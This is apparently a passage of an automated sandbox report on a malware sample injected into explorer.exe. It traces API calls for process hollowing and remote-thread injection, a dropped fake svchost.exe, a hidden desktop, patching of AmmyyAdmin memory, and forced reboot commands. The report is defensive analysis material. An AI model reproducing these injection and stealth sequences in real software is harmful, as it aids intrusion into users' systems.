                            • RtlMoveMemory.NTDLL(?,?,?), ref: 007D1BF4
                            • LoadLibraryA.KERNEL32(?,007D5848,00000000,00000000,772EF560,00000000,007D19B6,?,?,?,00000001,?,00000000), ref: 007D1C1C
                            • GetProcAddress.KERNEL32(00000000,-00000002), ref: 007D1C49
                            • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 007D1C9A
                            Memory Dump Source
                            • Source File: 00000010.00000002.507944127.00000000007D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7d1000_explorer.jbxd
                            Similarity
                            • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                            • String ID:
                            • API String ID: 3827878703-0
                            • Opcode ID: a9e96ee26061a314dad4b73c1319980ff21af834bf79b67b7368b20f4cadbacf
                            • Instruction ID: bbfaba5ac992a7ebe707afccd3ceb2d32dcd50c097c646478fb02ada39540fe3
                            • Opcode Fuzzy Hash: a9e96ee26061a314dad4b73c1319980ff21af834bf79b67b7368b20f4cadbacf
                            • Instruction Fuzzy Hash: E3318E71750616BFCB18CF29C984B66B7B8BF15315B94852EE84AC7700D73AE845CBB0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • OpenProcess.KERNEL32(00000400,00000000,?,?,00000001,?,00000000,007D11DD), ref: 007D26DB
                            • IsWow64Process.KERNEL32(000000FF,?), ref: 007D26ED
                            • IsWow64Process.KERNEL32(00000000,?), ref: 007D2700
                            • CloseHandle.KERNEL32(00000000), ref: 007D2716
                            Memory Dump Source
                            • Source File: 00000010.00000002.507944127.00000000007D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7d1000_explorer.jbxd
                            Similarity
                            • API ID: Process$Wow64$CloseHandleOpen
                            • String ID:
                            • API String ID: 331459951-0
                            • Opcode ID: 2fd555411080ece144841e11095ccbf700dab3098e7dda369da56aefb3ec0632
                            • Instruction ID: caee7bbc6510dff2f8fcb73646c72944a4eb25a23e0a419ed02bcda4b2284bff
                            • Opcode Fuzzy Hash: 2fd555411080ece144841e11095ccbf700dab3098e7dda369da56aefb3ec0632
                            • Instruction Fuzzy Hash: 88F0B471902218FF9B21CFA09D488FEB7BDEF05361B14426BEA0493240D7384F0296B5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 007D2A09: GetProcessHeap.KERNEL32(00000008,0000A000,007D10BF), ref: 007D2A0C
                              • Part of subcall function 007D2A09: RtlAllocateHeap.NTDLL(00000000), ref: 007D2A13
                            • GetLocalTime.KERNEL32(?,00000000), ref: 007D17F3
                            • wsprintfW.USER32 ref: 007D181D
                            Strings
                            • [%02d.%02d.%d %02d:%02d:%02d], xrefs: 007D1817
                            Memory Dump Source
                            • Source File: 00000010.00000002.507944127.00000000007D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7d1000_explorer.jbxd
                            Similarity
                            • API ID: Heap$AllocateLocalProcessTimewsprintf
                            • String ID: [%02d.%02d.%d %02d:%02d:%02d]
                            • API String ID: 377395780-613334611
                            • Opcode ID: 74866266c0996e1a6fab98b9c844323fdeb0100b28ba5d54a158a00d3a17ee74
                            • Instruction ID: 39f10ddce383216ce04b974c1cae4ad6e8990ac5d16bdd467752c69c51d0ed48
                            • Opcode Fuzzy Hash: 74866266c0996e1a6fab98b9c844323fdeb0100b28ba5d54a158a00d3a17ee74
                            • Instruction Fuzzy Hash: BDF03066900128BA87146BD99D059FFB3FCEB0CB02B00019BFA51E1181E67D5A50D3B9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Callgraph


                            Control-flow Graph

                            APIs
                            • NtUnmapViewOfSection.NTDLL ref: 00AD378C
                            Memory Dump Source
                            • Source File: 00000011.00000002.507716213.0000000000AD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AD1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_17_2_ad1000_explorer.jbxd
                            Similarity
                            • API ID: SectionUnmapView
                            • String ID:
                            • API String ID: 498011366-0
                            • Opcode ID: 32d6501c53c68f27c38dc068e71b53e8ab29af250c398eb698913e0b1c27fdf4
                            • Instruction ID: d0fdedf2d197c06f5433d41f7eda5e01eafb098587dd2c98832b735abb845bfa
                            • Opcode Fuzzy Hash: 32d6501c53c68f27c38dc068e71b53e8ab29af250c398eb698913e0b1c27fdf4
                            • Instruction Fuzzy Hash: 3711B2B4601D094BFF58FBB8989D27933E1FB18312F54402BE816C73A2EE398A818701
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            • LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,?,7473604B), ref: 00ADB5A7
                            • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 00ADB651
                            • VirtualProtect.KERNELBASE ref: 00ADB66F
                            Memory Dump Source
                            • Source File: 00000011.00000002.507949474.0000000000ADA000.00000040.80000000.00040000.00000000.sdmp, Offset: 00ADA000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_17_2_ada000_explorer.jbxd
                            Similarity
                            • API ID: ProtectVirtual$LibraryLoad
                            • String ID:
                            • API String ID: 895956442-0
                            • Opcode ID: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
                            • Instruction ID: d5065c1525cb53cd43fda4a792b103b31e97aadfc3022c03058a399f4d70babd
                            • Opcode Fuzzy Hash: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
                            • Instruction Fuzzy Hash: 5E51673277491D8BCB24AB38AC842F4B7D1F759325B59062BC49BC3385EB68C94683A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00AD1BF8: OpenFileMappingA.KERNEL32 ref: 00AD1C0F
                              • Part of subcall function 00AD1BF8: MapViewOfFile.KERNELBASE ref: 00AD1C2E
                            • SysFreeMap.PGOCR ref: 00AD36F7
                            • SleepEx.KERNEL32 ref: 00AD3701
                            Memory Dump Source
                            • Source File: 00000011.00000002.507716213.0000000000AD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AD1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_17_2_ad1000_explorer.jbxd
                            Similarity
                            • API ID: File$FreeMappingOpenSleepView
                            • String ID:
                            • API String ID: 4205437007-0
                            • Opcode ID: 637a91ef820c77fc4ae356701898ae5e96c28ad7dfb0808c97baeafa411b95c7
                            • Instruction ID: 19ea5033e0feb1db689f3716d9e0fc6f8514dfcdfd20b92d833cc367ad7c894b
                            • Opcode Fuzzy Hash: 637a91ef820c77fc4ae356701898ae5e96c28ad7dfb0808c97baeafa411b95c7
                            • Instruction Fuzzy Hash: 3C51A931318A085FDF19FF68D9996EA73E1EB94310F44461AE457C73A1DF38DA058782
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            control_flow_graph 113 ad1bf8-ad1c18 OpenFileMappingA 114 ad1c3b-ad1c48 113->114 115 ad1c1a-ad1c38 MapViewOfFile 113->115 115->114
                            APIs
                            Memory Dump Source
                            • Source File: 00000011.00000002.507716213.0000000000AD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AD1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_17_2_ad1000_explorer.jbxd
                            Similarity
                            • API ID: File$MappingOpenView
                            • String ID:
                            • API String ID: 3439327939-0
                            • Opcode ID: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
                            • Instruction ID: 7b18bf2a9a5305664bd9dff53b66634e50c4acc2a9d86ffb2661c4c52b5cd6c1
                            • Opcode Fuzzy Hash: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
                            • Instruction Fuzzy Hash: F5F01234318F4D4FAB45EF7C9C9C136B7E1EBA8202744857A985AC6265EF34C8458711
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Callgraph

                            callgraph 0 Function_00579357 1 Function_00571B56 2 Function_00572A55 45 Function_0057280D 2->45 48 Function_00572808 2->48 51 Function_00572A32 2->51 3 Function_00574555 4 Function_00571154 5 Function_00572454 5->4 7 Function_0057105D 5->7 28 Function_0057106C 5->28 29 Function_0057226C 5->29 37 Function_00571011 5->37 39 Function_0057181C 5->39 42 Function_00571000 5->42 47 Function_00572208 5->47 65 Function_005711DE 5->65 72 Function_005711CB 5->72 88 Function_00571090 5->88 89 Function_0057119F 5->89 6 Function_0057905E 8 Function_0057955C 9 Function_00571F5C 10 Function_00573A5A 11 Function_00578A59 12 Function_00571C58 13 Function_00579344 14 Function_00578F42 15 Function_00572340 22 Function_00571276 15->22 36 Function_00571912 15->36 86 Function_00571F96 15->86 16 Function_0057214E 17 Function_0057104C 18 Function_00578C49 19 Function_00571048 20 Function_00572777 20->37 21 Function_00579276 23 Function_00574675 24 Function_00572171 25 Function_00572766 25->42 26 Function_00571364 27 Function_00579462 38 Function_0057201D 29->38 54 Function_00571238 29->54 81 Function_00571CEF 29->81 29->88 30 Function_0057896A 31 Function_00579069 32 Function_00579116 33 Function_00579B14 34 Function_00571314 34->42 35 Function_00571214 36->17 67 Function_005718DC 36->67 95 Function_0057198C 36->95 97 Function_005718B9 36->97 37->65 39->37 39->42 96 Function_005714B0 39->96 40 Function_00579601 41 Function_00579B00 43 Function_0057900F 44 Function_00571F0F 44->7 44->34 44->39 66 Function_00572ADD 45->66 46 Function_0057920C 47->2 47->37 47->42 49 Function_00574537 50 Function_00579136 52 Function_0057233F 52->22 52->36 52->86 53 Function_0057473D 54->35 55 Function_00578A23 56 Function_00579821 57 Function_00579420 58 Function_0057472E 59 Function_005791D6 60 Function_00578CD6 61 Function_00578DD2 62 Function_005746D0 63 Function_005720D0 64 Function_00578EDF 98 Function_005719AF 67->98 68 Function_005792DB 69 Function_005743C7 70 Function_005793C1 71 Function_005743CE 73 Function_005713F4 73->28 73->42 74 Function_005720F2 74->37 74->42 75 Function_00578EFF 76 Function_00578AFD 77 Function_005747FC 78 Function_005754F9 79 Function_005795F8 80 Function_005745E2 81->1 81->12 81->65 82 Function_005719EF 83 Function_005720EC 84 Function_005789E9 85 Function_00578CE9 86->9 86->42 87 Function_00574496 90 Function_00578985 91 Function_00571483 91->4 92 Function_00578C8F 93 Function_00578D8F 94 Function_0057968E 95->82 96->17 96->26 96->28 96->37 96->42 96->73 96->88 96->91 98->82 99 Function_005793AB 100 Function_005726A9 100->5 100->28 100->42 100->52 100->65 100->100

                            Control-flow Graph

                            APIs
                              • Part of subcall function 005711DE: VirtualQuery.KERNEL32(?,?,0000001C), ref: 005711EB
                              • Part of subcall function 00571000: GetProcessHeap.KERNEL32(00000008,?,0057134A,?,00000000,00000001,00000000,?), ref: 00571003
                              • Part of subcall function 00571000: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0057100A
                            • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 005726CF
                            • RtlMoveMemory.NTDLL(00000000,?,?), ref: 00572703
                            • NtUnmapViewOfSection.NTDLL(000000FF), ref: 0057270C
                            Memory Dump Source
                            • Source File: 00000014.00000002.507841568.0000000000571000.00000040.80000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_571000_explorer.jbxd
                            Similarity
                            • API ID: HeapMemoryMove$AllocateProcessQuerySectionUnmapViewVirtual
                            • String ID:
                            • API String ID: 4050682147-0
                            • Opcode ID: c076ff6acc1fb90a9a13e00966421529807753458eaefb9559f65dbb20c3e8d1
                            • Instruction ID: 1d4f435187aa7a98c719d30c8999fc458a5af1ff18e38bc88ffced6bcc24f878
                            • Opcode Fuzzy Hash: c076ff6acc1fb90a9a13e00966421529807753458eaefb9559f65dbb20c3e8d1
                            • Instruction Fuzzy Hash: 29118E30501A52DFCB18AF75FD5CA663F68FB94351F10C418E95D8B2A2DA3589C9FB10
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00571000: GetProcessHeap.KERNEL32(00000008,?,0057134A,?,00000000,00000001,00000000,?), ref: 00571003
                              • Part of subcall function 00571000: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0057100A
                            • wsprintfA.USER32 ref: 00572484
                              • Part of subcall function 0057119F: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 005711A9
                              • Part of subcall function 0057119F: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,00572498), ref: 005711BB
                            • RtlMoveMemory.NTDLL(?,00000000,00000015), ref: 00572502
                            • GetTempPathW.KERNEL32(00000104,00000000,?,0000000F,?,?,00000000,?), ref: 0057253B
                            • GetTempFileNameW.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,?), ref: 00572547
                            • DeleteFileW.KERNEL32(00000000,?,?,00000000,?), ref: 0057254E
                            • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 00572557
                            • wsprintfW.USER32 ref: 005725BC
                            • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 005725F0
                            • lstrcatW.KERNEL32(00000000,\svchost.exe -debug -elevated), ref: 00572663
                              • Part of subcall function 005711DE: VirtualQuery.KERNEL32(?,?,0000001C), ref: 005711EB
                            • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00572621
                            • CloseHandle.KERNEL32(?), ref: 0057262B
                            • Sleep.KERNELBASE(000003E8), ref: 0057269E
                            Strings
                            Memory Dump Source
                            • Source File: 00000014.00000002.507841568.0000000000571000.00000040.80000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_571000_explorer.jbxd
                            Similarity
                            • API ID: File$CreateHeapTempwsprintf$AllocateCloseDeleteDirectoryHandleMappingMemoryMoveNameOpenPathProcessQuerySleepViewVirtualWritelstrcat
                            • String ID: %s%s$%s\%s$\svchost.exe -debug -elevated$runhtv
                            • API String ID: 364369146-1656551021
                            • Opcode ID: e7f3ff9988ff9d799cae8a4950b19c2a55905585e4e02e597821dc6d3e74f248
                            • Instruction ID: 69827b834c1fdda36602bf0b76eed4ce16448f3f62e27e1143ef3db480279840
                            • Opcode Fuzzy Hash: e7f3ff9988ff9d799cae8a4950b19c2a55905585e4e02e597821dc6d3e74f248
                            • Instruction Fuzzy Hash: 6051B170204742ABC714AF24EC8DB2E7FA5BF84340F00891DF69D5B292EB709948AB56
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            control_flow_graph 56 579b14-579b1f 57 579b20-579b26 56->57 58 579b82-579b83 57->58 59 579b29-579b36 57->59 62 579b85 58->62 63 579b89-579b95 58->63 60 579abe-579afe 59->60 61 579b39-579b3e 59->61 64 579b75-579b77 61->64 65 579b3f 61->65 67 579b87 62->67 68 579b4e-579b50 62->68 69 579d5d 63->69 70 579b9b-579ba8 63->70 74 579bec 64->74 75 579b78 64->75 65->64 72 579b41-579b4a 65->72 67->63 68->65 73 579b51 68->73 69->69 71 579bba-579bbf 70->71 76 579bc1 71->76 72->68 73->65 77 579b53-579b69 73->77 80 579bf6 74->80 81 579bee-579bf4 74->81 78 579bcc-579bd1 75->78 79 579b79-579b7c 75->79 82 579bc3 76->82 83 579bb0-579bb5 76->83 77->57 84 579b6b-579b74 77->84 85 579bd3-579bd7 78->85 79->58 87 579bf8-579bfa 80->87 81->80 86 579c6a-579c6d 81->86 92 579bc8-579bca 82->92 90 579bb6-579bb8 83->90 84->64 85->92 93 579bd9 85->93 91 579c72-579c75 86->91 88 579c03-579c07 87->88 89 579bfc-579c01 87->89 94 579c10-579c12 88->94 95 579c09-579c0e 88->95 89->88 90->71 90->76 96 579c77-579c79 91->96 92->78 92->85 97 579be4-579be9 93->97 98 579bdb-579be2 93->98 100 579c34-579c43 94->100 101 579c14 94->101 95->94 96->91 99 579c7b-579c7e 96->99 97->87 102 579beb 97->102 98->92 98->97 99->91 103 579c80-579c9c 99->103 105 579c45-579c4c 100->105 106 579c54-579c61 100->106 104 579c15-579c17 101->104 102->74 103->96 107 579c9e 103->107 108 579c20-579c24 104->108 109 579c19-579c1e 104->109 105->105 110 579c4e 105->110 106->106 111 579c63-579c65 106->111 112 579ca4-579ca8 107->112 108->104 113 579c26 108->113 109->108 110->90 111->90 114 579cef-579cf2 112->114 115 579caa-579cc0 LoadLibraryA 112->115 116 579c31 113->116 117 579c28-579c2f 113->117 119 579cf5-579cfc 114->119 118 579cc1-579cc6 115->118 116->100 117->104 117->116 118->112 122 579cc8-579cca 118->122 120 579d20-579d50 VirtualProtect * 2 119->120 121 579cfe-579d00 119->121 125 579d54-579d58 120->125 123 579d13-579d1e 121->123 124 579d02-579d11 121->124 126 579cd3-579ce0 GetProcAddress 122->126 127 579ccc-579cd2 122->127 123->124 124->119 125->125 128 579d5a 125->128 129 579ce2-579ce7 126->129 130 579ce9-579cec 126->130 127->126 128->69 129->118
                            Memory Dump Source
                            • Source File: 00000014.00000002.508008751.0000000000578000.00000040.80000000.00040000.00000000.sdmp, Offset: 00578000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_578000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3a5a135f5fc61fd3ac64a686e6e7735035a0d648545e3caad7407c1b6cd7ce3e
                            • Instruction ID: 7c6e74cfb3f6954d87ed34c2b4230eb6cf5705602e5d7ea6b5bd4f1a5e2be231
                            • Opcode Fuzzy Hash: 3a5a135f5fc61fd3ac64a686e6e7735035a0d648545e3caad7407c1b6cd7ce3e
                            • Instruction Fuzzy Hash: F0816D715593424FDB229A38FC806B1BFA5FB52320B288669D5DEC72C3E7545C06E7B0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            control_flow_graph 156 57119f-5711b1 OpenFileMappingA 157 5711c6-5711ca 156->157 158 5711b3-5711c3 MapViewOfFile 156->158 158->157
                            APIs
                            • OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 005711A9
                            • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,00572498), ref: 005711BB
                            Memory Dump Source
                            • Source File: 00000014.00000002.507841568.0000000000571000.00000040.80000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_571000_explorer.jbxd
                            Similarity
                            • API ID: File$MappingOpenView
                            • String ID:
                            • API String ID: 3439327939-0
                            • Opcode ID: dfcaeefc5ce811ca55a193bdaf5cd52849ef2029d13ecaed7ff19f2fe8122c30
                            • Instruction ID: cb4afd6feceb715ee0c2b82bedd7eaa173f0584bf531267fe348f3149967da23
                            • Opcode Fuzzy Hash: dfcaeefc5ce811ca55a193bdaf5cd52849ef2029d13ecaed7ff19f2fe8122c30
                            • Instruction Fuzzy Hash: 49D0E222705221ABE6301EBA7C0CF836EDDEF96AE1B014125B60DDA190D6608800D6B0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            control_flow_graph 159 5711cb-5711dd UnmapViewOfFile FindCloseChangeNotification
                            APIs
                            • UnmapViewOfFile.KERNEL32(00000000,?,00572699), ref: 005711CF
                            • FindCloseChangeNotification.KERNELBASE(?,?,00572699), ref: 005711D6
                            Memory Dump Source
                            • Source File: 00000014.00000002.507841568.0000000000571000.00000040.80000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_571000_explorer.jbxd
                            Similarity
                            • API ID: ChangeCloseFileFindNotificationUnmapView
                            • String ID:
                            • API String ID: 943506614-0
                            • Opcode ID: 91de1e37af62b07d09249203a724bc62e089116c047009f352931a2fdf3b172a
                            • Instruction ID: 8f584562e57d44d41f550a6a551fb9fedf417493887b5914dcd8f0110e39a677
                            • Opcode Fuzzy Hash: 91de1e37af62b07d09249203a724bc62e089116c047009f352931a2fdf3b172a
                            • Instruction Fuzzy Hash: E0B01232005430DB871527747C0C9DB3E58FE592213090344F20D8601047240886FEE5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            control_flow_graph 160 571000-571010 GetProcessHeap RtlAllocateHeap
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,?,0057134A,?,00000000,00000001,00000000,?), ref: 00571003
                            • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0057100A
                            Memory Dump Source
                            • Source File: 00000014.00000002.507841568.0000000000571000.00000040.80000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_571000_explorer.jbxd
                            Similarity
                            • API ID: Heap$AllocateProcess
                            • String ID:
                            • API String ID: 1357844191-0
                            • Opcode ID: 315dbde4521ef445818aead2d2f66f2fc0c3fe1dcc3446a7f5f49100d96c4694
                            • Instruction ID: 0937cfc9725c7f6de5d3b96adc6626f7ed1bee81d8898818d52400e883a2421f
                            • Opcode Fuzzy Hash: 315dbde4521ef445818aead2d2f66f2fc0c3fe1dcc3446a7f5f49100d96c4694
                            • Instruction Fuzzy Hash: D3A002B56911005FDD4557A5BE0DA153959EB55701F004544734D8D0509B645548FF25
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                              • Part of subcall function 005711DE: VirtualQuery.KERNEL32(?,?,0000001C), ref: 005711EB
                            • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,00000000,00000000,?), ref: 00571D24
                            • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 00571DCC
                            • RtlMoveMemory.NTDLL(00000000,005743D8,00000016), ref: 00571DF3
                            • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 00571E1B
                            • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 00571E2B
                            • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter), ref: 00571E3A
                            • GetLastError.KERNEL32 ref: 00571E42
                            • CloseHandle.KERNEL32(00000000), ref: 00571E50
                            • Sleep.KERNEL32(000003E8), ref: 00571E57
                            • GetModuleHandleA.KERNEL32(ntdll,atan), ref: 00571E6D
                            • GetProcAddress.KERNEL32(00000000), ref: 00571E74
                            • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00571E8A
                            • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00571EB4
                            • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00571EC7
                            • CloseHandle.KERNEL32(00000000), ref: 00571ECE
                            • Sleep.KERNEL32(000001F4), ref: 00571ED5
                            • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00571EE9
                            • CloseHandle.KERNEL32(00000000), ref: 00571EF4
                            • CloseHandle.KERNEL32(?), ref: 00571EFA
                            • CloseHandle.KERNEL32(?), ref: 00571F00
                            • CloseHandle.KERNEL32(00000000), ref: 00571F03
                            Strings
                            Memory Dump Source
                            • Source File: 00000014.00000002.507841568.0000000000571000.00000040.80000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_571000_explorer.jbxd
                            Similarity
                            • API ID: Handle$Close$Memory$Process$CreateMoveSectionSleepUnmapViewWrite$AddressErrorLastModuleMutexOpenProcQueryReadRemoteThreadVirtual
                            • String ID: atan$ntdll$opera_shared_counter
                            • API String ID: 1287803545-2737717697
                            • Opcode ID: 26bd03fe15fadf429d53411a5e301c16aefa1536b1f3464339ebdeb12a9cb1b3
                            • Instruction ID: 4ae459e963d38bf8538534a7ffeb20d129d41e35748029908de19b62f99c38b2
                            • Opcode Fuzzy Hash: 26bd03fe15fadf429d53411a5e301c16aefa1536b1f3464339ebdeb12a9cb1b3
                            • Instruction Fuzzy Hash: AB519931204705AFD300DF69EC88E6BBBADFB98350F004519F94DD7291DB60DD48ABA6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            control_flow_graph 602 572171-57218a StrStrIW 603 5721c0-5721cc StrStrIW 602->603 604 57218c-5721b5 RtlZeroMemory ShellExecuteExW 602->604 606 5721f5-5721f8 603->606 607 5721ce-5721e4 RtlAdjustPrivilege 603->607 605 5721bb-5721be 604->605 608 572201-572205 605->608 606->608 607->605 609 5721e6-5721f3 ExitWindowsEx 607->609 609->605
                            APIs
                            • StrStrIW.SHLWAPI(?,run.exe), ref: 00572186
                            • RtlZeroMemory.NTDLL(?,0000003C), ref: 00572194
                            • ShellExecuteExW.SHELL32(?), ref: 005721B5
                            • StrStrIW.SHLWAPI(?,reboot.exe), ref: 005721C8
                            • RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 005721DC
                            • ExitWindowsEx.USER32(00000006,00020000), ref: 005721ED
                            Strings
                            Memory Dump Source
                            • Source File: 00000014.00000002.507841568.0000000000571000.00000040.80000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_571000_explorer.jbxd
                            Similarity
                            • API ID: AdjustExecuteExitMemoryPrivilegeShellWindowsZero
                            • String ID: open$reboot.exe$run.exe
                            • API String ID: 3582748089-806815163
                            • Opcode ID: b8459474fd6ed6bd1db2ac4faa46335b02e77a2e338e02f8a00a4efc3e853e3a
                            • Instruction ID: ce532ef2455238d4724da4e3fd2f1024bdce7a0ec2dee021447a56f03e87916b
                            • Opcode Fuzzy Hash: b8459474fd6ed6bd1db2ac4faa46335b02e77a2e338e02f8a00a4efc3e853e3a
                            • Instruction Fuzzy Hash: E0112A75940218FADB10AFA5FC49FDA7FA8BB18750F008011BE19EA1A1D7709658FFA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00571238: FindWindowA.USER32(AmmyyAdmin3Main,00000000), ref: 00571246
                              • Part of subcall function 00571238: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00571259
                            • CreateDesktopW.USER32(00000000,00000000,00000000,10000000,00000000,00000010), ref: 00572289
                            • SetThreadDesktop.USER32(00000000), ref: 00572298
                            • RtlZeroMemory.NTDLL(?,00000044), ref: 005722A5
                            • RtlZeroMemory.NTDLL ref: 005722C3
                            • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 005722DC
                              • Part of subcall function 0057201D: WriteProcessMemory.KERNEL32(?,0040889C,?,00000001,00000000), ref: 00572043
                              • Part of subcall function 0057201D: WriteProcessMemory.KERNEL32(?,004579F0,?,00000001,00000000), ref: 00572057
                              • Part of subcall function 0057201D: WriteProcessMemory.KERNEL32(?,0044A2C2,?,00000001,00000000), ref: 0057206B
                              • Part of subcall function 0057201D: WriteProcessMemory.KERNEL32(?,00449F61,?), ref: 00572087
                              • Part of subcall function 0057201D: WriteProcessMemory.KERNEL32(?,00449F86,?,00000002,00000000), ref: 0057209E
                              • Part of subcall function 0057201D: WriteProcessMemory.KERNEL32(?,0045CE34,00000003,00000001,00000000), ref: 005720B2
                              • Part of subcall function 0057201D: WriteProcessMemory.KERNEL32(?,00451F52,?,00000001,00000000), ref: 005720C6
                              • Part of subcall function 00571CEF: OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,00000000,00000000,?), ref: 00571D24
                              • Part of subcall function 00571CEF: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 00571DCC
                              • Part of subcall function 00571CEF: RtlMoveMemory.NTDLL(00000000,005743D8,00000016), ref: 00571DF3
                              • Part of subcall function 00571CEF: RtlMoveMemory.NTDLL(-00000016,00000363), ref: 00571E1B
                              • Part of subcall function 00571CEF: NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 00571E2B
                            • ResumeThread.KERNEL32(?,?,00000004,?,?,?,00000010), ref: 00572333
                            Strings
                            Memory Dump Source
                            • Source File: 00000014.00000002.507841568.0000000000571000.00000040.80000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_571000_explorer.jbxd
                            Similarity
                            • API ID: Memory$Process$Write$Thread$CreateDesktopMoveSectionUnmapViewWindowZero$FindOpenResume
                            • String ID: D
                            • API String ID: 1435540535-2746444292
                            • Opcode ID: 74afb1ab8e23956fbed09e6dc267d138007d37ad8ac2aa4dc12e7fa0a549cc60
                            • Instruction ID: 805aff41a32fa878ce53dc9d752e1b41ceb75652cb82f6706b2983833962470a
                            • Opcode Fuzzy Hash: 74afb1ab8e23956fbed09e6dc267d138007d37ad8ac2aa4dc12e7fa0a549cc60
                            • Instruction Fuzzy Hash: B3116735104209EBC200AFA6FC4DF6B7FADFB95344F018918B64E86161CB36A58CBB65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00571276: GetCurrentProcessId.KERNEL32 ref: 00571288
                              • Part of subcall function 00571276: GetCurrentThreadId.KERNEL32 ref: 00571290
                              • Part of subcall function 00571276: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 005712A0
                              • Part of subcall function 00571276: Thread32First.KERNEL32(00000000,0000001C), ref: 005712AE
                              • Part of subcall function 00571276: CloseHandle.KERNEL32(00000000), ref: 00571307
